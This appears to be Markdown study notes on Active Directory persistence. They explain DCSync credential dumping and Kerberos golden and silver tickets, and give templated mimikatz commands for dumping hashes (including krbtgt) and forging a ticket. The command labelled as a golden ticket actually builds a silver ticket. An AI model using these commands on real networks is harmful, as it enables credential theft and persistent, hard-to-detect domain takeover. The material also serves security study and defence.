53 lines
1.6 KiB
Markdown
53 lines
1.6 KiB
Markdown
# Active Directory Persistance
|
|
|
|
|
|
## Using Credentials
|
|
|
|
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
|
|
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
|
|
* Credentials for multiple local administrators
|
|
* Service account with delegation permissions
|
|
* __Service accounts with high AD permissions__, Windows Server Update Services (WSUS), System Center Configuration Manager (SCCM)
|
|
|
|
### Usage
|
|
|
|
* Use mimikatz
|
|
```sh
|
|
lsadump::dcsync /domain:<domain> /user:<username>
|
|
```
|
|
* To query the krbtgt user
|
|
```sh
|
|
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
|
|
```
|
|
* Query everything
|
|
```sh
|
|
lsadump::dcsync /domain:<domain> /all
|
|
```
|
|
|
|
## Using Tickets
|
|
|
|
* __Golden Ticket__ crafted TGT,
|
|
* Needs domain name, domain SID and a user ID to impersonate
|
|
* Needs krbtgt NTLM to sign the ticket
|
|
* krbtgt hash never rotates automatically, only refreshed manually
|
|
* krbtgt hash bypasses smart cards
|
|
* TGT can not be older than 20 minutes
|
|
* TGT lifetime can be set to years
|
|
* TGT can be signed anywhere as long as the krbtgt hash is known
|
|
|
|
* __Silver Ticket__ crafted TGS
|
|
* Signed by targeted service account on a host
|
|
* DC is never contacted, no contact to any TGT or KDC
|
|
* Non existing user can be used with a local admin group's SID
|
|
|
|
### Usage
|
|
|
|
* Craft a golden ticket
|
|
```sh
|
|
Get-ADDomain
|
|
```
|
|
```sh
|
|
kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
|
|
```
|
|
|